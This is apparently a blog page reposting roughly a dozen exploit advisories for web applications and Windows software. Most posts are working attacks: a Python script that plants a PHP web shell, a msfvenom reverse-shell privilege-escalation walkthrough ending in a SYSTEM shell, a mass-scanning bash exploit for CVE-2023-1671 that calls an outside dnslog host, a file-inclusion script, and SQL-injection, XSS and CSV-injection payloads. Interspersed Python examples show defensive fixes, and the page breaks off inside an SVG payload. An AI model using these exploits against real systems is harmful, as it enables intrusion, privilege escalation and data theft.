All posts published by ISHACK AI BOT
-
Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution
# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution (RCE)
# Date: 4/23/2023
# Author: Or4nG.M4n
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: windows
#
# Vuln File : SystemSettings.php   < here you can inject php code
#
#   if(isset($_POST['content'])){
#       foreach($_POST['content'] as $k => $v)
#           file_put_contents("../{$k}.html",$v);   <=== put any code into welcome.html or whatever you want
#   }
#
# Vuln File : home.php   < here you can include and execute your php code
#
#   <h3 class="text-center">Welcome</h3>
#   <hr>
#   <div class="welcome-content">
#       <?php include("welcome.html") ?>   <=== include
#   </div>

import requests

url = input("Enter url :")
postdata = {'content[welcome]':'<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'}
resp = requests.post(url+"/classes/SystemSettings.php?f=update_settings", postdata)
print("[+] injection in welcome page")
print("[+]"+url+"/?cmd=ls -al")
print("\n")
-
Wondershare Filmora 12.2.9.2233 - Unquoted Service Path
############################################################################
#                                                                          #
# Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path   #
# Date: 2023/04/23                                                         #
# Exploit Author: msd0pe                                                   #
# Vendor Homepage: https://www.wondershare.com                             #
# My Github: https://github.com/msd0pe-1                                   #
#                                                                          #
############################################################################

Wondershare Filmora: Versions =< 12.2.9.2233 contains an unquoted service path which allows attackers to escalate privileges to the system level.

[1] Find the unquoted service path:

> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

Wondershare Native Push Service   NativePushService   C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe   Auto

[2] Get information about the service:

> sc qc "NativePushService"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: NativePushService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wondershare Native Push Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

[3] Generate a reverse shell:

> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe

[4] Upload the reverse shell to C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe

> put Wondershare.exe
> ls
drw-rw-rw-          0  Sun Apr 23 14:51:47 2023  .
drw-rw-rw-          0  Sun Apr 23 14:51:47 2023  ..
drw-rw-rw-          0  Sun Apr 23 14:36:26 2023  Wondershare Filmora Update
drw-rw-rw-          0  Sun Apr 23 14:37:13 2023  Wondershare NativePush
-rw-rw-rw-       7168  Sun Apr 23 14:51:47 2023  Wondershare.exe
drw-rw-rw-          0  Sun Apr 23 13:52:30 2023  WSHelper

[5] Start listener

> nc -lvp 4444

[6] Reboot the service/server

> sc stop "NativePushService"
> sc start "NativePushService"

OR

> shutdown /r

[7] Enjoy !

192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
-
Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
#!/bin/bash
# Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
# Exploit Author: Behnam Abasi Vanda
# Vendor Homepage: https://www.sophos.com
# Version: Sophos Web Appliance older than version 4.3.10.4
# Tested on: Ubuntu
# CVE : CVE-2023-1671
# Shodan Dork: title:"Sophos Web Appliance"
# Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce
# Reference : https://vulncheck.com/blog/cve-2023-1671-analysis

TARGET_LIST="$1"

# =====================
BOLD="\033[1m"
RED="\e[1;31m"
GREEN="\e[1;32m"
YELLOW="\e[1;33m"
BLUE="\e[1;34m"
NOR="\e[0m"
# ====================

get_new_subdomain() {
    cat MN.txt | grep 'YES' >/dev/null;ch=$?
    if [ $ch -eq 0 ];then
        echo -e " [+] Trying to get Subdomain $NOR"
        rm -rf cookie.txt
        sub=`curl -i -c cookie.txt -s -k -X $'GET' \
            -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \
            $'http://www.dnslog.cn/getdomain.php?t=0' | grep dnslog.cn`
        echo -e " [+]$BOLD$GREEN Subdomain : $sub $NOR"
    fi
}

check_vuln() {
    curl -k --trace-ascii % "https://$1/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';ping $sub -c 3 #" | base64)"
    req=`curl -i -s -k -b cookie.txt -X $'GET' \
        -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \
        $'http://www.dnslog.cn/getrecords.php?t=0'`
    echo "$req" | grep 'dnslog.cn' >/dev/null;ch=$?
    if [ $ch -eq 0 ];then
        echo "YES" > MN.txt
        echo -e " [+]$BOLD $RED https://$1 Vulnerable :D $NOR"
        echo "https://$1" >> vulnerable.lst
    else
        echo -e " [-] https://$1 Not Vulnerable :| $NOR"
        echo "NO" > MN.txt
    fi
}

echo ' ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██████╗███████╗ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ███║██╔════╝╚════██║ ██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗╚██║███████╗ ██╔╝ ██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝ ██║██╔═══██╗ ██╔╝ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║╚██████╔╝ ██║ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ██████╗ ██╗ ██╗ ██████╗ ███████╗██╗ ██╗███╗ ██╗ █████╗ ███╗ ███╗ ██╗ ██╔══██╗╚██╗ ██╔╝ ██╔══██╗██╔════╝██║ ██║████╗ ██║██╔══██╗████╗ ████║ ██╗╚██╗ ██████╔╝ ╚████╔╝ ██████╔╝█████╗ ███████║██╔██╗ ██║███████║██╔████╔██║ ╚═╝ ██║ ██╔══██╗ ╚██╔╝ ██╔══██╗██╔══╝ ██╔══██║██║╚██╗██║██╔══██║██║╚██╔╝██║ ▄█╗ ██║ ██████╔╝ ██║ ██████╔╝███████╗██║ ██║██║ ╚████║██║ ██║██║ ╚═╝ ██║ ▀═╝██╔╝ ╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ '

if test "$#" -ne 1; then
    echo " ----------------------------------------------------------------"
    echo " [!] please give the target list file : bash CVE-2023-1671.sh targets.txt "
    echo " ---------------------------------------------------------------"
    exit
fi

rm -rf cookie.txt
echo "YES" > MN.txt

for target in `cat $TARGET_LIST`
do
    get_new_subdomain;
    echo " [~] Checking $target"
    check_vuln "$target"
done

rm -rf MN.txt
rm -rf cookie.txt
-
PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting
# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS)
# Google Dork: None
# Date: 4/26/2023
# Exploit Author: Or4nG.M4n
# Vendor Homepage: https://github.com/jcwebhole
# Software Link: https://github.com/jcwebhole/php_restaurants
# Version: 1.0

functions.php

function login(){
    global $conn;
    $email = $_POST['email'];
    $pw = $_POST['password'];
    $sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` = '".md5($pw)."'";   <-- there is No filter to secure sql query parm[email][password]
    $result = $conn->query($sql);
    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
            setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day
            header('location: index.php');
        }
    } else {
        header('location: login.php?m=Wrong Password');
    }
}

login bypass at admin page /rest1/admin/login.php

email & password : ' OR 1=1 --      <- add [space] at the end of the payload

cross site scripting main page /index.php

xhttp.open("GET", "functions.php?f=getRestaurants<?php if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here we can insert our xss payload ?> ", true);
xhttp.send();
</script>   <-- when you insert your payload don't forget to add </script>

like xss payload : </script><img onerror=alert(1) src=a>
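The login() routine above concatenates the e-mail field straight into the SQL string, so a quote closes the literal and the trailing "-- " comments the password clause away. The following added example (not code from the PHP Restaurants project) ports that query to an in-memory SQLite table, which stands in for the MySQL connection, and places it beside the parameterised form that closes the hole; the users table, its one row and the inputs are constructed for the demo, and md5 is kept only because the original stores md5 hashes.

```python
# Added example: string-built login query vs. a bound-parameter query, run on SQLite.
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed users table mirroring the columns the PHP code reads."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    # md5 mirrors the page; it is not an acceptable password hash (see note below).
    conn.execute(
        "INSERT INTO users (id, email, password) VALUES (?, ?, ?)",
        (1, "admin@example.test", hashlib.md5(b"correct horse").hexdigest()),
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, pw: str):
    """Faithful port of the concatenated query from functions.php."""
    sql = (
        "SELECT id FROM users WHERE email = '" + email + "'"
        " AND password = '" + hashlib.md5(pw.encode()).hexdigest() + "'"
    )
    rows = conn.execute(sql).fetchall()
    return rows[0][0] if rows else None


def login_fixed(conn: sqlite3.Connection, email: str, pw: str):
    """Same check with bound parameters: input can never change the query's shape."""
    rows = conn.execute(
        "SELECT id FROM users WHERE email = ? AND password = ?",
        (email, hashlib.md5(pw.encode()).hexdigest()),
    ).fetchall()
    return rows[0][0] if rows else None


def demo() -> dict:
    """Run both variants against the bypass string from the advisory and a real login."""
    conn = make_db()
    payload = "' OR 1=1 -- "  # the advisory's payload, trailing space included
    return {
        "vuln_bypass": login_vulnerable(conn, payload, payload),    # 1: bypassed
        "fixed_bypass": login_fixed(conn, payload, payload),        # None: rejected
        "vuln_legit": login_vulnerable(conn, "admin@example.test", "correct horse"),
        "fixed_legit": login_fixed(conn, "admin@example.test", "correct horse"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

In the vulnerable variant the query becomes `... WHERE email = '' OR 1=1 -- ' AND password = '...'`, which matches every row, so the first user (here the admin) is returned. The bound-parameter variant treats the whole payload as an e-mail address and finds nothing. Independently of the injection, password storage should use a slow salted hash (bcrypt, scrypt or Argon2) rather than md5.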
-
phpMyFAQ v3.1.12 - CSV Injection
Exploit Title: phpMyFAQ v3.1.12 - CSV Injection
Application: phpMyFAQ
Version: 3.1.12
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://www.phpmyfaq.de/
Software Link: https://download.phpmyfaq.de/phpMyFAQ-3.1.12.zip
Date of found: 21.04.2023
Author: Mirabbas Ağalarov
Tested on: Windows

2. Technical Details & POC
========================================
Step 1. Login as user
Step 2. Go to the user control panel, change the name to =calc|a!z| and save
Step 3. If the admin exports users as CSV, CSV injection occurs on the admin's computer and the calculator will open

payload: =calc|a!z|

Poc video: https://youtu.be/lXwaexX-1uU
-
projectSend r1605 - Private file download
Exploit Title: projectSend r1605 - Private file download
Application: projectSend
Version: r1605
Bugs: IDOR
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 24-01-2023
Author: Mirabbas Ağalarov
Tested on: Linux

Technical Details & POC
========================================
1. Access to private files of any user, including admin: just change the id

GET /process.php?do=download&id=[any user's private pictures id] HTTP/1.1
Host: localhost
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/manage-files.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: download_started=false; PHPSESSID=e46dtgmf95uu0usnceebfqbp0f
Connection: close
-
revive-adserver v5.4.1 - Cross-Site Scripting (XSS)
Exploit Title: revive-adserver v5.4.1 - Cross-Site Scripting (XSS)
Application: revive-adserver
Version: 5.4.1
Bugs: XSS
Technology: PHP
Vendor URL: https://www.revive-adserver.com/
Software Link: https://www.revive-adserver.com/download/
Date of found: 31-03-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
steps:
1. Go to create banner
2. Select the advanced section
3. Write this payload in the prepend and append parameters (%3Cscript%3Ealert%281%29%3C%2Fscript%3E)

POST /www/admin/banner-advanced.php HTTP/1.1
Host: localhost
Content-Length: 213
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: sessionID=5224583cf474cd32d2ef37171c4d7894
Connection: close

clientid=3&campaignid=2&bannerid=2&token=94c97eabe1ada8e7ae8f204e2ebf7180&prepend=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&append=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submitbutton=De%C4%9Fi%C5%9Fiklikleri+Kaydet

We are sending this link to the admin. If the admin clicks it, they will be exposed to the XSS:

http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2
-
admidio v4.2.5 - CSV Injection
Exploit Title: admidio v4.2.5 - CSV Injection
Application: admidio
Version: 4.2.5
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://www.admidio.org/
Software Link: https://www.admidio.org/download.php
Date of found: 26.04.2023
Author: Mirabbas Ağalarov
Tested on: Windows

2. Technical Details & POC
========================================
Step 1. Login as user
Step 2. Go to My profile (edit profile), set the postal code to =calc|a!z| and save
        (http://localhost/admidio/adm_program/modules/profile/profile_new.php?user_uuid=4b060d07-4e63-429c-a6b7-fc55325e92a2)
Step 3. If the admin exports users as a CSV or Excel file, CSV injection occurs on the admin's computer and the calculator will open
        (http://localhost/admidio/adm_program/modules/groups-roles/lists_show.php?rol_ids=2)

payload: =calc|a!z|

Poc video: https://www.youtube.com/watch?v=iygwj1izSMQ
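Both the phpMyFAQ and the Admidio reports above describe the same defect: a profile field that begins with `=` is written unchanged into a CSV export, and the spreadsheet that opens it evaluates the cell. The following added example (not code from either project) is an export-side cell sanitiser of the kind that closes it, together with a small export routine; the user records are constructed for the demo.

```python
# Added example: neutralising spreadsheet formula triggers before a CSV export.
import csv
import io

# Leading characters that make Excel/LibreOffice treat a cell as a formula. Tab and
# CR are included because some applications strip leading whitespace before parsing.
_FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed records; the second one carries the payload from the advisories above.
SAMPLE_USERS = [
    {"id": 1, "name": "Alice", "postal_code": "12345"},
    {"id": 2, "name": "=calc|a!z|", "postal_code": "+1 555"},
]


def neutralize_cell(value) -> str:
    """Return text a spreadsheet will display literally rather than evaluate.

    Non-string values (ids, counters) are emitted as-is; only user-supplied text
    is prefixed, so a genuine negative number is not turned into a quoted string.
    """
    if value is None:
        return ""
    if not isinstance(value, str):
        return str(value)
    if value.startswith(_FORMULA_TRIGGERS):
        # A leading apostrophe forces text mode in Excel and LibreOffice.
        return "'" + value
    return value


def export_users_csv(users) -> str:
    """Write the rows with csv.writer, which also doubles embedded quotes, so a
    cell cannot break out of its quoting to start a formula mid-field."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["id", "name", "postal_code"])
    for user in users:
        writer.writerow([
            neutralize_cell(user["id"]),
            neutralize_cell(user["name"]),
            neutralize_cell(user["postal_code"]),
        ])
    return buf.getvalue()


if __name__ == "__main__":
    print(export_users_csv(SAMPLE_USERS), end="")
```

The prefix is applied at export time rather than at input time, so a name that legitimately starts with `+` or `-` is still stored faithfully and only the file handed to a spreadsheet is altered. Quoting every field (`QUOTE_ALL`) matters as well: without it a value such as `"` followed by a formula could end the field early in some parsers.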
-
SoftExpert (SE) Suite v2.1.3 - Local File Inclusion
# Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion
# Date: 27-04-2023
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.softexpert.com/
# Version: 2.0 < 2.1.3
# Tested on: Kali Linux
# CVE : CVE-2023-30330
# SE Suite versions tested: 2.0.15.31, 2.0.15.115
# https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330

#!/bin/bash
# Usage: ./lfi-poc.sh <domain> <username> <password> <File Path>

target=$1
u=$2
p=$3
file=$(echo -n "$4"|base64 -w 0)

end="\033[0m\e[0m"
red="\e[0;31m\033[1m"
blue="\e[0;34m\033[1m"

echo -e "\n$4 : $file\n"
echo -e "${blue}\nGETTING SESSION COOKIE${end}"

cookie=$(curl -i -s -k -X $'POST' \
    -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \
    -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \
    --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \
    "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2)

echo "cookie: $cookie"

function LFI () {
    curl -s -k -X $'POST' \
        -H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \
        -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \
        --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \
        "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"
}

echo -e "${blue}\nExploiting LFI:${end}"
LFI

function logout () {
    curl -i -s -k -X $'POST' \
        -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \
        -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \
        "https://$target/softexpert/selogout"
}

echo -e "${blue}\nLogging out${end}"
logout >/dev/null
echo -e "\n\nDone!"
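Two posts on this page turn on the same missing control: the groceries system above writes `../{$k}.html` with a caller-chosen `$k`, and SE Suite resolves a base64-encoded `managerPath` into a file read. Neither pins the resulting path to a fixed directory. The following added example (not code from either vendor) shows the check that does: an allow-list on the bare name plus a realpath comparison against the base directory. The base directory `/srv/app/settings`, the regular expression and the helper names are the example's own assumptions.

```python
# Added example: confining a user-supplied file name to one directory.
import base64
import binascii
import os
import re

# Allow-list for bare names (the server adds the extension itself). Dots are
# deliberately excluded, so "..", "x.php" and similar never pass. Assumed policy.
_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

# Assumed base directory for the demo; it does not need to exist for realpath.
BASE_DIR = "/srv/app/settings"


def safe_join(base_dir: str, user_name: str, suffix: str = "") -> str:
    """Return an absolute path inside base_dir or raise ValueError.

    Two independent checks: the allow-list rejects traversal syntactically, and the
    realpath comparison catches anything the allow-list might miss (e.g. symlinks
    or a future relaxation of the pattern).
    """
    if not _NAME_RE.fullmatch(user_name):
        raise ValueError(f"rejected file name: {user_name!r}")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_name + suffix))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes base directory: {user_name!r}")
    return candidate


def decode_manager_path(b64: str) -> str:
    """Strictly decode a base64 file reference (the shape SE Suite's managerPath has)."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError("malformed base64 path") from exc


def resolve_include(base_dir: str, b64: str) -> str:
    """Decode, then confine: the decoded string is just another untrusted name."""
    return safe_join(base_dir, decode_manager_path(b64))


def settings_target_ok(user_key: str) -> bool:
    """Would the groceries-style write of '<key>.html' stay inside BASE_DIR?"""
    try:
        safe_join(BASE_DIR, user_key, ".html")
        return True
    except ValueError:
        return False


def include_ok(b64: str) -> bool:
    """Would an SE-Suite-style base64 file reference stay inside BASE_DIR?"""
    try:
        resolve_include(BASE_DIR, b64)
        return True
    except ValueError:
        return False


# Constructed inputs for the demo.
ENCODED_OK = base64.b64encode(b"report").decode()
ENCODED_TRAVERSAL = base64.b64encode(b"../../etc/passwd").decode()

if __name__ == "__main__":
    print("welcome ->", settings_target_ok("welcome"))
    print("../classes/x ->", settings_target_ok("../classes/x"))
    print("report ->", include_ok(ENCODED_OK))
    print("../../etc/passwd ->", include_ok(ENCODED_TRAVERSAL))
```

The allow-list alone would stop both advisories' inputs; the realpath check is what keeps the function correct when a later change widens the pattern to allow subdirectories or dots.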
-
Serendipity 2.4.0 - File Inclusion RCE
## Exploit Title: Serendipity 2.4.0 - File Inclusion RCE
## Author: nu11secur1ty
## Date: 04.26.2023
## Vendor: https://docs.s9y.org/index.html
## Software: https://github.com/s9y/Serendipity/releases/tag/2.4.0
## Reference: https://portswigger.net/web-security/file-upload
## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

## Description:
The already authenticated attacker can upload HTML files on the server, which is absolutely dangerous and STUPID. In this file, the attacker can be coding a malicious web-socket responder that can connect with some nasty webserver somewhere. It depends on the scenario: the attacker can steal very sensitive information every day, for a very long period of time, until the other users know that something is not ok with this system and decide to stop using it, but maybe they will be too late for this decision.

STATUS: HIGH Vulnerability

[+]Exploit:

```HTML
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>NodeJS WebSocket Server</title>
</head>
<body>
  <h1>You have just sent a message to your attacker,<br>
  that you are already connected to him.</h1>
  <script>
    const ws = new WebSocket("ws://attacker:8080");
    ws.addEventListener("open", () => {
      console.log("We are connected to you");
      ws.send("How are you, dear :)?");
    });
    ws.addEventListener('message', function (event) {
      console.log(event.data);
    });
  </script>
</body>
</html>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/s9y/2023/Serendipity-2.4.0)

## Proof and Exploit:
[href](https://streamable.com/2s80z6)

## Time spent: 01:27:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
-
MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control
# Exploit Title: MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control
# Date: 2023-04-28
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://millegpg.it/
# Software Homepage: https://millegpg.it - https://millewin.it/prodotti/governo-clinico-3/
# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe
# Version: 5.9.2
# Tested on: Microsoft Windows 10 Enterprise x64 22H2, build 19045.2913
# CVE: CVE-2023-25438

MilleGPG / MilleGPG5, also known as "Governo Clinico 3"

Vendor: Millennium S.r.l. / Dedalus Group - Dedalus Italia S.p.a. / Genomedics S.r.l.

Affected/tested version: MilleGPG5 5.9.2

Summary:
Mille General Practice Governance (MilleGPG): an interactive tool to address an effective quality of care through the Italian general practice network. MilleGPG is an innovative IT support for the evaluation and optimization of patient care and intervention processes, complete with new features for the management of the COVID-19 vaccine campaign. It is an irreplaceable "ally" for the General Practitioner, also offering contextual access to the most authoritative scientific content and CME training.

Vuln desc:
The application is prone to insecure file/folder permissions on its default installation path, wrongly allowing some files to be modified by unprivileged users, malicious processes and/or threat actors. An attacker can exploit the weakness by abusing the "write" permission on the main application, which is available to all users on the system or network.

Details:
Any low privileged user can elevate their privileges by abusing files/folders that have incorrect permissions, e.g.:

C:\Program Files\MilleGPG5\MilleGPG5.exe (main gui application)
C:\Program Files\MilleGPG5\plugin\ (GPGCommand.exe, nginx and php files)
C:\Program Files\MilleGPG5\k-platform\ (api and webapp files)

such as BUILTIN\Users:(I)(OI)(CI)(R,W) and/or FILE_GENERIC_WRITE, FILE_WRITE_DATA and FILE_WRITE_EA
-
PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)
Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)
Application: PHPFusion
Version: 9.10.30
Bugs: XSS
Technology: PHP
Vendor URL: https://www.php-fusion.co.uk/home.php
Software Link: https://sourceforge.net/projects/php-fusion/
Date of found: 28-04-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
steps:
1. Go to Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw)
2. Upload a malicious svg file

svg file content ===>

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
